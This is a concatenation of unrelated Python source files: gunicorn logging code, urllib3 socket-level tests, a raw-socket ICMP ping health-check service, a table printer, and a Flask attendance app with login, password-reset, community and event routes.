with self.lock:
if self.logfile is not None:
self.logfile.close()
self.logfile = open(self.cfg.errorlog, "a+")
os.dup2(self.logfile.fileno(), sys.stdout.fileno())
os.dup2(self.logfile.fileno(), sys.stderr.fileno())
for log in loggers():
for handler in log.handlers:
if isinstance(handler, logging.FileHandler):
handler.acquire()
try:
if handler.stream:
handler.close()
handler.stream = handler._open()
finally:
handler.release()
def close_on_exec(self):
for log in loggers():
for handler in log.handlers:
if isinstance(handler, logging.FileHandler):
handler.acquire()
try:
if handler.stream:
util.close_on_exec(handler.stream.fileno())
finally:
handler.release()
def _get_gunicorn_handler(self, log):
for h in log.handlers:
if getattr(h, "_gunicorn", False):
return h
def _set_handler(self, log, output, fmt, stream=None):
# remove previous gunicorn log handler
h = self._get_gunicorn_handler(log)
if h:
log.handlers.remove(h)
if output is not None:
if output == "-":
h = logging.StreamHandler(stream)
else:
util.check_is_writeable(output)
h = logging.FileHandler(output)
# make sure the user can reopen the file
try:
os.chown(h.baseFilename, self.cfg.user, self.cfg.group)
except OSError:
# it's probably OK there, we assume the user has given
# /dev/null as a parameter.
pass
h.setFormatter(fmt)
h._gunicorn = True
log.addHandler(h)
def _set_syslog_handler(self, log, cfg, fmt, name):
# setup format
if not cfg.syslog_prefix:
prefix = cfg.proc_name.replace(":", ".")
else:
prefix = cfg.syslog_prefix
prefix = "gunicorn.%s.%s" % (prefix, name)
# set format
fmt = logging.Formatter(r"%s: %s" % (prefix, fmt))
# syslog facility
try:
facility = SYSLOG_FACILITIES[cfg.syslog_facility.lower()]
except KeyError:
raise RuntimeError("unknown facility name")
# parse syslog address
socktype, addr = parse_syslog_address(cfg.syslog_addr)
# finally setup the syslog handler
h = logging.handlers.SysLogHandler(
address=addr, facility=facility, socktype=socktype
)
h.setFormatter(fmt)
h._gunicorn = True
log.addHandler(h)
def _get_user(self, environ):
user = None
http_auth = environ.get("HTTP_AUTHORIZATION")
if http_auth and http_auth.lower().startswith("basic"):
auth = http_auth.split(" ", 1)
if len(auth) == 2:
try:
# b64decode doesn't accept unicode in Python < 3.3
# so we need to convert it to a byte string
auth = base64.b64decode(auth[1].strip().encode("utf-8"))
# b64decode returns a byte string
auth = auth.decode("utf-8")
auth = auth.split(":", 1)
except (TypeError, binascii.Error, UnicodeDecodeError) as exc:
self.debug("Couldn't get username: %s", exc)
return user
if len(auth) == 2:
user = auth[0]
return user
``` |
{
"source": "1T/urllib3",
"score": 2
} |
#### File: test/with_dummyserver/test_socketlevel.py
```python
from urllib3 import HTTPConnectionPool, HTTPSConnectionPool
from urllib3.poolmanager import proxy_from_url
from urllib3.exceptions import (
MaxRetryError,
ProxyError,
ReadTimeoutError,
SSLError,
)
from urllib3 import util
from dummyserver.testcase import SocketDummyServerTestCase
from dummyserver.server import (
DEFAULT_CERTS, DEFAULT_CA, get_unreachable_address)
from nose.plugins.skip import SkipTest
from threading import Event
import socket
import time
import ssl
class TestCookies(SocketDummyServerTestCase):
def test_multi_setcookie(self):
def multicookie_response_handler(listener):
sock = listener.accept()[0]
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += sock.recv(65536)
sock.send(b'HTTP/1.1 200 OK\r\n'
b'Set-Cookie: foo=1\r\n'
b'Set-Cookie: bar=1\r\n'
b'\r\n')
sock.close()
self._start_server(multicookie_response_handler)
pool = HTTPConnectionPool(self.host, self.port)
r = pool.request('GET', '/', retries=0)
self.assertEquals(r.headers, {'set-cookie': 'foo=1, bar=1'})
class TestSNI(SocketDummyServerTestCase):
def test_hostname_in_first_request_packet(self):
if not util.HAS_SNI:
raise SkipTest('SNI-support not available')
done_receiving = Event()
self.buf = b''
def socket_handler(listener):
sock = listener.accept()[0]
self.buf = sock.recv(65536) # We only accept one packet
done_receiving.set() # let the test know it can proceed
sock.close()
self._start_server(socket_handler)
pool = HTTPSConnectionPool(self.host, self.port)
try:
pool.request('GET', '/', retries=0)
except SSLError: # We are violating the protocol
pass
done_receiving.wait()
self.assertTrue(self.host.encode() in self.buf,
"missing hostname in SSL handshake")
class TestSocketClosing(SocketDummyServerTestCase):
def test_recovery_when_server_closes_connection(self):
# Does the pool work seamlessly if an open connection in the
# connection pool gets hung up on by the server, then reaches
# the front of the queue again?
done_closing = Event()
def socket_handler(listener):
for i in 0, 1:
sock = listener.accept()[0]
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf = sock.recv(65536)
body = 'Response %d' % i
sock.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: %d\r\n'
'\r\n'
'%s' % (len(body), body)).encode('utf-8'))
sock.close() # simulate a server timing out, closing socket
done_closing.set() # let the test know it can proceed
self._start_server(socket_handler)
pool = HTTPConnectionPool(self.host, self.port)
response = pool.request('GET', '/', retries=0)
self.assertEqual(response.status, 200)
self.assertEqual(response.data, b'Response 0')
done_closing.wait() # wait until the socket in our pool gets closed
response = pool.request('GET', '/', retries=0)
self.assertEqual(response.status, 200)
self.assertEqual(response.data, b'Response 1')
def test_connection_refused(self):
# Does the pool retry if there is no listener on the port?
host, port = get_unreachable_address()
pool = HTTPConnectionPool(host, port)
self.assertRaises(MaxRetryError, pool.request, 'GET', '/', retries=0)
def test_connection_timeout(self):
timed_out = Event()
def socket_handler(listener):
timed_out.wait()
sock = listener.accept()[0]
sock.close()
self._start_server(socket_handler)
pool = HTTPConnectionPool(self.host, self.port, timeout=0.001)
self.assertRaises(ReadTimeoutError, pool.request, 'GET', '/', retries=0)
timed_out.set()
def test_timeout_errors_cause_retries(self):
def socket_handler(listener):
sock = listener.accept()[0]
# First request.
# Pause before responding so the first request times out.
time.sleep(0.002)
sock.close()
sock = listener.accept()[0]
# Second request.
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += sock.recv(65536)
# Now respond immediately.
body = 'Response 2'
sock.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: %d\r\n'
'\r\n'
'%s' % (len(body), body)).encode('utf-8'))
sock.close() # Close the socket.
# In situations where the main thread throws an exception, the server
# thread can hang on an accept() call. This ensures everything times
# out within 3 seconds. This should be long enough for any socket
# operations in the test suite to complete
default_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(1)
try:
self._start_server(socket_handler)
t = util.Timeout(connect=0.001, read=0.001)
pool = HTTPConnectionPool(self.host, self.port, timeout=t)
response = pool.request('GET', '/', retries=1)
self.assertEqual(response.status, 200)
self.assertEqual(response.data, b'Response 2')
finally:
socket.setdefaulttimeout(default_timeout)
class TestProxyManager(SocketDummyServerTestCase):
def test_simple(self):
def echo_socket_handler(listener):
sock = listener.accept()[0]
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += sock.recv(65536)
sock.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: %d\r\n'
'\r\n'
'%s' % (len(buf), buf.decode('utf-8'))).encode('utf-8'))
sock.close()
self._start_server(echo_socket_handler)
base_url = 'http://%s:%d' % (self.host, self.port)
proxy = proxy_from_url(base_url)
r = proxy.request('GET', 'http://google.com/')
self.assertEqual(r.status, 200)
# FIXME: The order of the headers is not predictable right now. We
# should fix that someday (maybe when we migrate to
# OrderedDict/MultiDict).
self.assertEqual(sorted(r.data.split(b'\r\n')),
sorted([
b'GET http://google.com/ HTTP/1.1',
b'Host: google.com',
b'Accept-Encoding: identity',
b'Accept: */*',
b'',
b'',
]))
def test_headers(self):
def echo_socket_handler(listener):
sock = listener.accept()[0]
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += sock.recv(65536)
sock.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: %d\r\n'
'\r\n'
'%s' % (len(buf), buf.decode('utf-8'))).encode('utf-8'))
sock.close()
self._start_server(echo_socket_handler)
base_url = 'http://%s:%d' % (self.host, self.port)
# Define some proxy headers.
proxy_headers = {'For The Proxy': 'YEAH!'}
proxy = proxy_from_url(base_url, proxy_headers=proxy_headers)
conn = proxy.connection_from_url('http://www.google.com/')
r = conn.urlopen('GET', 'http://www.google.com/', assert_same_host=False)
self.assertEqual(r.status, 200)
# FIXME: The order of the headers is not predictable right now. We
# should fix that someday (maybe when we migrate to
# OrderedDict/MultiDict).
self.assertTrue(b'For The Proxy: YEAH!\r\n' in r.data)
def test_retries(self):
def echo_socket_handler(listener):
sock = listener.accept()[0]
# First request, which should fail
sock.close()
# Second request
sock = listener.accept()[0]
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += sock.recv(65536)
sock.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: %d\r\n'
'\r\n'
'%s' % (len(buf), buf.decode('utf-8'))).encode('utf-8'))
sock.close()
self._start_server(echo_socket_handler)
base_url = 'http://%s:%d' % (self.host, self.port)
proxy = proxy_from_url(base_url)
conn = proxy.connection_from_url('http://www.google.com')
r = conn.urlopen('GET', 'http://www.google.com',
assert_same_host=False, retries=1)
self.assertEqual(r.status, 200)
self.assertRaises(ProxyError, conn.urlopen, 'GET',
'http://www.google.com',
assert_same_host=False, retries=0)
class TestSSL(SocketDummyServerTestCase):
def test_ssl_failure_midway_through_conn(self):
def socket_handler(listener):
sock = listener.accept()[0]
sock2 = sock.dup()
ssl_sock = ssl.wrap_socket(sock,
server_side=True,
keyfile=DEFAULT_CERTS['keyfile'],
certfile=DEFAULT_CERTS['certfile'],
ca_certs=DEFAULT_CA)
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += ssl_sock.recv(65536)
# Deliberately send from the non-SSL socket.
sock2.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: 2\r\n'
'\r\n'
'Hi').encode('utf-8'))
sock2.close()
ssl_sock.close()
self._start_server(socket_handler)
pool = HTTPSConnectionPool(self.host, self.port)
self.assertRaises(SSLError, pool.request, 'GET', '/', retries=0)
``` |
{
"source": "1tylermitchell/healthcheck",
"score": 3
} |
#### File: 1tylermitchell/healthcheck/ping.py
```python
__date__ = "2014/02/27"
__version__ = "v0.93"
import sys
import time
# -----------------------------------------------------------------------
# A thread based polling service with pause and kill.
# Since it polls the function passed in, the function
# needs to return as soon as possible.
import threading
ST_KILLED = 0
ST_PAUSED = 1
ST_RUNNING = 2
ST_names = { 0:"killed", 1:"paused", 2:"running" }
class Poll(threading.Thread):
def __init__(self, func, args=(), name=None, period=0.1):
# we need a tuple here
if type(args) != type((1,)):
args = (args,)
self._function = func
self._args = args
self.period = period
threading.Thread.__init__(self, target=func, name=name, args=())
self._uptime = time.time()
self._state = ST_RUNNING
self.start()
def run(self):
while self._state != ST_KILLED:
if self._state == ST_RUNNING:
self._function(self._args)
time.sleep(self.period)
# note: all threads must be killed before python will exit!
def kill(self):
self._state = ST_KILLED
def pause(self):
if self._state == ST_RUNNING:
self._state = ST_PAUSED
def resume(self):
if self._state == ST_PAUSED:
self._state = ST_RUNNING
def uptime(self):
return time.time() - self._uptime
def state(self):
return ST_names[self._state]
def __str__(self):
return self.getName()
@staticmethod
def thread_list():
return [x for x in threading.enumerate()
if x.getName() != "MainThread"]
@staticmethod
def tlist():
"""Human readable version of thread_list()"""
for t in Poll.thread_list():
if isinstance(t, Poll):
print "%-16s %-8s %4.3f" % (t, t.state(), t.uptime())
@staticmethod
def killall():
for t in Poll.thread_list():
t.kill()
# -----------------------------------------------------------------------
# ping from scratch
import os
import types
import struct
import socket
class PingService(object):
"""Send out icmp ping requests at 'delay' intervals and
watch for replies. The isup() method can be used by
other threads to check the status of the remote host.
@host - (string) ip of host to ping
@delay - (float) delay in seconds between pings
@its_dead_jim - (int) seconds to wait before running offline()
@verbose - (bool) print round trip stats for every reply
@persistent - (bool) thread continues to run even if no reply
usage: p = PingService('192.168.1.1')
p.start() - begin ping loop
p.isup() - True if host has replied recently
p.stop() - stop ping loop
online() and offline() methods can be overloaded:
def my_online(self):
self.log(self.host + " is up")
p.online = types.MethodType(my_online, p)
"""
# provide a class-wide thread-safe message queue
msgs = []
def __init__(self, host, delay=1.0, its_dead_jim=4,
verbose=True, persistent=False):
self.host = host
self.delay = delay
self.verbose = verbose
self.persistent = persistent
self.obituary_delay = its_dead_jim * delay
self.pad = "getoff my lawn" # should be 14 chars or more
socket.setdefaulttimeout(0.01)
self.started = 0
self.thread = None
self._isup = False
self.sock = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.getprotobyname('icmp'))
try:
self.sock.connect((host, 22))
except socket.gaierror, ex:
self.log("ping socket cannot connect to %s: %s" % (host, ex[1]))
self.sock.close()
return
def log(self, msg):
if not self.verbose:
msg = time.strftime("%H:%M:%S ") + msg
self.msgs.append(msg)
def start(self):
self.seq = 0
self.pid = os.getpid()
self.last_heartbeat = 0
# send a ping right away
self.time_to_send = self.started = time.time()
self.thread = Poll(self._ping, (None), name=self.host)
#retry = int(round(self.obituary_delay / 0.2))
## retry, before letting caller deal with a down state
#while retry > 0 and not self._isup:
# time.sleep(0.2)
# retry -= 1
def stop(self):
if self.thread:
self.thread.kill()
self.thread = None
def _icmp_checksum(self, pkt):
n = len(pkt)
two_bytes = struct.unpack("!%sH" % (n/2), pkt)
chksum = sum(two_bytes)
if n & 1 == 1:
chksum += pkt[-1]
chksum = (chksum >> 16) + (chksum & 0xffff)
chksum += chksum >> 16
return ~chksum & 0xffff
def _icmp_create(self, data):
fmt = "!BBH"
args = [8, 0, 0]
if data and len(data) > 0:
fmt += "%ss" % len(data)
args.append(data)
args[2] = self._icmp_checksum(struct.pack(fmt, *args))
return struct.pack(fmt, *args)
def _icmp_parse(self, pkt):
"""Parse ICMP packet"""
string_len = len(pkt) - 4 # Ignore IP header
fmt = "!BBH"
if string_len:
fmt += "%ss" % string_len
unpacked_packet = struct.unpack(fmt, pkt)
typ, code, chksum = unpacked_packet[:3]
if self._icmp_checksum(pkt) != 0:
self.log("%s reply checksum is not zero" % self.host)
try:
data = unpacked_packet[3]
except IndexError:
data = None
return typ, code, data
def _ping(self, args):
pdatafmt = "!HHd%ds" % len(self.pad)
now = time.time()
if now >= self.time_to_send:
# send ping packet
self.seq += 1
self.seq &= 0xffff
pdata = struct.pack(pdatafmt, self.pid, self.seq, now, self.pad)
self.sock.send(self._icmp_create(pdata))
self.time_to_send = now + self.delay
if self._isup and now - self.last_heartbeat > self.obituary_delay:
self._isup = False
self.offline()
if self.last_heartbeat == 0 \
and not self.persistent \
and now - self.started > self.obituary_delay:
if self.verbose:
self.log("no response from " + self.host)
self.thread.kill()
self.thread = None
return
try:
rbuf = self.sock.recv(10000)
now = time.time() # refresh 'now' to make rtt more accurate
except socket.timeout:
return
if len(rbuf) <= 20:
self.log("%s truncated reply" % self.host)
return
# parse ICMP packet; ignore IP header
typ, code, rdata = self._icmp_parse(rbuf[20:])
if typ == 8:
self.log("%s is pinging us" % self.host)
self.last_heartbeat = now
if not self._isup:
self._isup = True
self.online()
return
if typ == 3:
self.log("%s dest unreachable (code=%d)" % (self.host, code));
return
if typ != 0:
self.log("%s packet not an echo reply (%d) " % (self.host, typ))
return
if not rdata:
self.log("%s packet contains no data" % (self.host))
return
if len(rdata) != 12 + len(self.pad):
# other ping programs can cause this
# self.log("%s not our ping (len=%d)" % (self.host, len(rdata)))
return
# parse ping data
(ident, seqno, timestamp, pad) = struct.unpack(pdatafmt, rdata)
if ident != self.pid:
# other instances of PingService can cause this
#self.log("%s not our ping (ident=%d)" % (self.host, ident))
return
if seqno != self.seq:
self.log("%s sequence out of order " % self.host +
"got(%d) expected(%d)" % (seqno, self.seq))
return
if rdata and len(rdata) >= 8:
self.last_heartbeat = now
if not self._isup:
self._isup = True
self.online()
if self.verbose:
str = "%d bytes from %s: seq=%u" % (
len(rbuf),
# inet_ntop not available on windows
'.'.join([('%d' % ord(c)) for c in list(rbuf[12:16])]),
self.seq)
# calculate rounttrip time
rtt = now - timestamp
rtt *= 1000
# note that some boxes that run python
# can't resolve milisecond time deltas ...
if rtt > 0:
str += ", rtt=%.1f ms" % rtt
self.log(str)
def online(self):
if not self.verbose:
self.log("%s is up" % self.host)
def offline(self):
if not self.verbose:
self.log("%s is down" % self.host)
def isup(self):
return self._isup
# ----------------------------------------------------------------------------
# demonstrate PingService
if __name__ == "__main__":
import traceback
import types
if len(sys.argv) < 2:
print "usage: python2 ping.py <ip>"
sys.exit(1)
ping_svc = PingService(sys.argv[1])
try:
ping_svc.start()
while len(Poll.thread_list()) > 0:
time.sleep(0.2)
# print log messages
while len(PingService.msgs) > 0:
print PingService.msgs.pop(0)
except KeyboardInterrupt:
pass
except:
t, v, tb = sys.exc_info()
traceback.print_exception(t, v, tb)
# note: all threads must be stopped before python will exit!
ping_svc.stop()
sys.exit(0)
```
#### File: 1tylermitchell/healthcheck/pprinttable.py
```python
def pprinttable(rows):
if len(rows) > 1:
headers = rows[0]._fields
lens = []
for i in range(len(rows[0])):
lens.append(len(max([x[i] for x in rows] + [headers[i]],key=lambda x:len(str(x)))))
formats = []
hformats = []
for i in range(len(rows[0])):
if isinstance(rows[0][i], int):
formats.append("%%%dd" % lens[i])
else:
formats.append("%%-%ds" % lens[i])
hformats.append("%%-%ds" % lens[i])
pattern = " | ".join(formats)
hpattern = " | ".join(hformats)
separator = "-+-".join(['-' * n for n in lens])
print hpattern % tuple(headers)
print separator
_u = lambda t: t.decode('UTF-8', 'replace') if isinstance(t, str) else t
for line in rows:
print pattern % tuple(_u(t) for t in line)
elif len(rows) == 1:
row = rows[0]
hwidth = len(max(row._fields,key=lambda x: len(x)))
for i in range(len(row)):
print "%*s = %s" % (hwidth,row._fields[i],row[i])
``` |
{
"source": "1UC1F3R616/CommunityAttendanceApp",
"score": 2
} |
#### File: 1UC1F3R616/CommunityAttendanceApp/general.py
```python
from flask import (
Blueprint,
render_template,
request,
jsonify,
make_response
)
# Templates folder and static_folder are for auth routes
general_bp = Blueprint('general_bp',
__name__,
template_folder='templates',
static_folder='static',)
from app import db
from dryFunctions import *
from models import (
Users,
Communities,
CommunityMembers
)
## Imports for Auth Routes
from flask import flash
import threading
from os import environ
from models import BlackListedTokens
sg_api = environ.get('SG_API')
## Putting all Auth Routes untill the issue is resolved!
@general_bp.route('/register/user', methods=['POST'])
def user_registration():
print('\n\n\n')
print(str(request.json))
print('\n\n\n')
userName = request.json.get('userName')
userEmail = request.json.get('userEmail')
userPassword = request.json.get('userPassword')
userPasswordConfirm = request.json.get('userPasswordConfirm')
if find_missing(userName, userEmail, userPassword, userPasswordConfirm):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Missing Params'
}
elif userPassword != userPasswordConfirm:
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Confirmation Password Different'
}
elif malformed_length(
{
userName: [3, 64],
userEmail: [3, 64],
userPassword: [3, 64]
}
):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Param Length is Bad'
}
elif user_exist(email=hex_hash(userEmail)):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'User Exist'
}
elif not is_email_valid(userEmail):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Email is not valid'
}
else:
try:
userEmailHash = hex_hash(userEmail)
userPasswordHash = hex_hash(userPassword)
new_user = Users(username=userName, email=userEmailHash, password=<PASSWORD>)
db.session.add(new_user)
db.session.commit()
token = encode_auth_token(user_detail(userEmailHash).get('userId')).decode()
payLoad = {
'userName': userName,
'userEmail': userEmailHash,
'message': 'User Successfully Created',
'token': token
}
return make_response(jsonify(payLoad), 201)
except Exception as e:
print(str(e))
db.session.rollback()
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Something went wrong'
}
return make_response(jsonify(payLoad), 400)
@general_bp.route('/login/user', methods=['POST'])
def user_login():
userEmail = request.json.get('userEmail')
userPassword = request.json.get('userPassword')
rememberMe = request.json.get('rememberMe')
if find_missing(userEmail, userPassword, rememberMe):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Missing Params'
}
elif not user_exist(email=hex_hash(userEmail)):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'User Does not Exist'
}
else:
userEmailHash = hex_hash(userEmail)
userPasswordHash = hex_hash(userPassword)
user_object = user_detail(userEmailHash)
if (userPasswordHash == user_object.get('userPassword')):
token = encode_auth_token(user_object.get('userId'), remember_me=rememberMe).decode()
payLoad = {
'userName': user_object.get('userName'),
'userEmail': userEmailHash,
'message': 'Success LogIn',
'token': token
}
return make_response(jsonify(payLoad), 200)
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Password Mismatch'
}
return make_response(jsonify(payLoad), 400)
@general_bp.route('/password/reset', methods=['POST'])
def forgot_password():
userEmail = request.json.get('userEmail')
if find_missing(userEmail):
payLoad = {
'userEmail': '',
'message': 'Missing Params'
}
elif malformed_length(
{
userEmail: [3, 64],
}
):
payLoad = {
'userEmail': '',
'message': 'Param Length is Bad'
}
elif not user_exist(email=hex_hash(userEmail)):
payLoad = {
"email": userEmail,
"message": "Make a Sign-up"
}
else:
userDetails = user_detail(email=hex_hash(userEmail))
userName = userDetails.get('userName')
passwordResetLink = "https://attendance2hosted.herokuapp.com/auth/password/update/" + \
encode_auth_token(user_id=userEmail, valid_minutes=5).decode()
templateId = "d-bca83b14b0f44357b6a78fe531249832"
url = "https://api.sendgrid.com/v3/mail/send"
print(sg_api)
email_header = {'Content-Type': 'application/json', "Authorization": sg_api}
email_body = {
"personalizations": [
{
"to": [
{
"email": userEmail
}
],
"dynamic_template_data": {
"userName": userName,
"passwordResetLink": passwordResetLink
}
}
],
"from": {
"email": "<EMAIL>"
},
"template_id": templateId
}
threading.Thread(target=send_email, args=(url, email_header, email_body)).start()
#send_email(url, email_header, email_body)
payLoad = {
"email": userEmail,
"message": "Check your email"
}
return make_response(jsonify(payLoad), 202)
return make_response(jsonify(payLoad), 400)
@general_bp.route('/password/update/<emailHashToken>', methods=['GET', 'PATCH', 'POST'])
def password_updation(emailHashToken):
userEmail = decode_auth_token(emailHashToken)
if request.method=='POST':
if userEmail == 'Signature expired. Please log in again.':
flash('I suppose you are timed out')
return render_template('passwordReset.html') # Render to Home Page
elif userEmail == 'Invalid token. Please log in again.':
flash('Maybe Hackers love to play')
return render_template('passwordReset.html') # Render to Home Page
else:
userEmailHash = hex_hash(userEmail)
if not user_exist(userEmailHash):
flash('Firstly you should Create an Account')
return render_template('passwordReset.html') # Render to Home Page #--todo-- # Redirect to home page
userEmail = request.form.get('userEmail')
userPassword = request.form.get('userPassword')
userPasswordConfirm = request.form.get('userPasswordConfirm')
if malformed_length(
{
userEmail: [3, 64],
userPassword: [<PASSWORD>]
}
):
flash('Password length is Absurd')
return render_template('passwordReset.html')
elif user_detail(hex_hash(userEmail)).get('userEmail') != userEmailHash:
flash('Is this a Typo?')
return render_template('passwordReset.html')
else:
user = Users.query.filter_by(userEmail=userEmailHash).first()
user.userPassword = <PASSWORD>(<PASSWORD>)
db.session.commit()
return render_template('passwordReset.html') #--todo-- # Redirect to home page
return render_template('passwordReset.html')
@general_bp.route('logout/user', methods=['GET'])
def logout_user():
token = request.headers.get('Authorization')
print(token)
if token:
if isBlackListed(token):
payLoad ={
"message": "logged-out-already"
}
elif malformed_length(
{
token: [3, 1024],
}
):
payLoad = {
'message': ['this-request-is-not-processed',
'length-constraint-applied'
]
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
"message": ["not-a-valid-request",
"try-login-first"]
}
else:
blackListed = BlackListedTokens(token=token)
db.session.add(blackListed)
db.session.commit()
payLoad = {
"message": "user-logged-out"
}
return make_response(jsonify(payLoad), 200)
payLoad = {
"message": "missing-token"
}
return make_response(jsonify(payLoad), 400)
########################################
# HomePage for Everyone
@general_bp.route('/', methods=['GET'])
def testing_route():
return "Working!!"
@general_bp.route('/community/create', methods=['POST'])
def create_community():
token = request.headers.get('Authorization')
communityName = request.json.get('communityName')
communityDescription = request.json.get('communityDescription')
if find_missing(token, communityName):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
communityName: [1, 64],
communityDescription: [0, 256]
}
):
payLoad = {
'message': 'bad-length-params'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
# If a User creates a two community with same names then that's a problem
userId = decode_auth_token(token)
# User Exists or not shall be checked else sqlalchemy error if valid but false token is sended #--todo--
try:
comJoinToken = Communities.query.filter(Communities.userId==userId, Communities.communityName==communityName).first().joinToken
if comJoinToken != None:
payLoad = {
'message': ['choose-a-new-name',
'delete-older-community',
'same-community-name-exist']
}
return make_response(jsonify(payLoad), 400)
except Exception as e:
print(str(e))
community = Communities(userId, communityName, communityDescription)
db.session.add(community)
db.session.commit()
communityQuery = Communities.query.filter(Communities.userId==userId, Communities.communityName==communityName).first()
comJoinToken = communityQuery.joinToken
communityId = communityQuery.communityId
payLoad = {
'userId': userId,
'communityName': communityName,
'communityDescription': communityDescription,
'comJoinToken': comJoinToken,
'communityId': communityId,
'message': 'community-successfully-created'
}
return make_response(jsonify(payLoad), 201)
return make_response(jsonify(payLoad), 400)
@general_bp.route('/community/join', methods=['POST'])
def join_community():
token = request.headers.get('Authorization')
joinToken = request.json.get('joinToken')
if find_missing(token, joinToken):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
joinToken: [16, 32], # 22 exactly
}
):
payLoad = {
'message': 'bad-length-params'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
userId = decode_auth_token(token)
comJoinToken = Communities.query.filter_by(joinToken=joinToken).first()
if comJoinToken == None:
payLoad = {
'message': 'incorrect-join-token'
}
return make_response(jsonify(payLoad), 400)
elif py_boolean(comJoinToken.joinTokenValid) == False:
payLoad = {
'message': 'community-joining-is-closed'
}
return make_response(jsonify(payLoad), 403)
communityId = comJoinToken.communityId
# user me join same community more than once
try:
userInCommunity = CommunityMembers.query.filter(CommunityMembers.userId==userId, CommunityMembers.communityId==communityId).first()
if userInCommunity != None:
payLoad = {
'message': 'you-are-already-in-this-community'
}
return make_response(jsonify(payLoad), 400)
except Exception as e:
print(str(e))
communityMember = CommunityMembers(userId, communityId)
db.session.add(communityMember)
db.session.commit()
payLoad = {
'userId': userId,
'communityId': communityId,
'message': 'community-successfully-joined'
}
return make_response(jsonify(payLoad), 200)
return make_response(jsonify(payLoad), 400)
# Set Event
@general_bp.route('/event/set', methods=['POST'])
def set_event():
"""
Endpoint to set an Event and put on hold if-
start now is false
Required: Admin
return: event hold status | auth fail
"""
token = request.headers.get('Authorization')
event_name_ = request.json.get('event_name')
event_description_ = request.json.get('event_description')
ending_time_delta_ = request.json.get('ending_time_delta')
location_range_ = request.json.get('location_range')
communityId_ = request.json.get('communityId') # How to get this is a creative part
latitude_ = request.json.get('latitude')
longitude_ = request.json.get('longitude')
broadcast_choice_ = request.json.get('broadcast_choice')
start_event_ = request.json.get('start_event') # New add_on
if find_missing(token, event_name_, ending_time_delta_, location_range_,
latitude_, longitude_, broadcast_choice_, start_event_, communityId_):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
token: [16, 1024],
event_name_: [3, 128],
event_description_: [0, 2048],
}
):
payLoad = {
'message': 'bad-length-params'
}
elif malformed_dtc(
{
ending_time_delta_: 'i',
location_range_: 'i',
latitude_: 'f',
longitude_: 'f',
ending_time_delta_: 'i',
location_range_: 'i',
communityId_: 'i'
}
):
payLoad = {
'message': 'bad-datatype'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
latitude_ = float(latitude_)
longitude_ = float(longitude_)
ending_time_delta_ = int(ending_time_delta_)
location_range_ = int(location_range_)
communityId_ = int(communityId_)
if py_boolean(broadcast_choice_):
broadcast_choice_ = 1
else:
broadcast_choice_ = 0
if py_boolean(start_event_):
start_event_ = 1
else:
start_event_ = 0
# check if user has that community registered under him/her and is Authorized
userId = decode_auth_token(token)
userEmail_ = Users.query.get(userId).userEmail
communityRegistered = [x.communityId for x in Communities.query.filter_by(userId=userId).all()]
if communityId_ not in communityRegistered:
payLoad = {
'message': 'You-Are-Not-Registered-as-Community-Head-for-this-company'
}
return make_response(jsonify(payLoad), 403)
# Getting OTP
otp_ = random_otp()
if otp_ == 'Fail':
payLoad = {
'message': 'OTP-Generation-Failed'
}
return make_response(jsonify(payLoad), 500)
creation_date_ = datetime.datetime.now()
if start_event_ == 1:
new_event = Events(creation_date= creation_date_, userEmail=userEmail_, \
otp=otp_, event_name=event_name_, event_description=event_description_, \
ending_time_delta=ending_time_delta_, location_range=location_range_, \
latitude=latitude_, longitude=longitude_, broadcast_choice=broadcast_choice_, \
communityId=communityId_)
db.session.add(new_event)
db.session.commit()
payLoad = {
'OTP': otp_,
'EventName': event_name_,
'EndingInMin': ending_time_delta_,
'CommunityId': communityId_,
'EventStarted': True,
'BroadcastChoice': broadcast_choice_,
'LocationValidInMeters': location_range_
}
return make_response(payLoad, 200) # Object of type Response is not JSON serializable
else: # else add it in hold
new_hold = HoldedEvents(creation_date= creation_date_, userEmail=userEmail_, \
otp=otp_, event_name=event_name_, event_description=event_description_, \
ending_time_delta=ending_time_delta_, location_range=location_range_, \
broadcast_choice=broadcast_choice_, communityId=communityId_)
db.session.add(new_hold)
db.session.commit()
payLoad = {
'OTP': otp_,
'EventName': event_name_,
'EndingInMin': ending_time_delta_,
'CommunityId': communityId_,
'EventStarted': False,
'BroadcastChoice': broadcast_choice_,
'LocationValidInMeters': location_range_
}
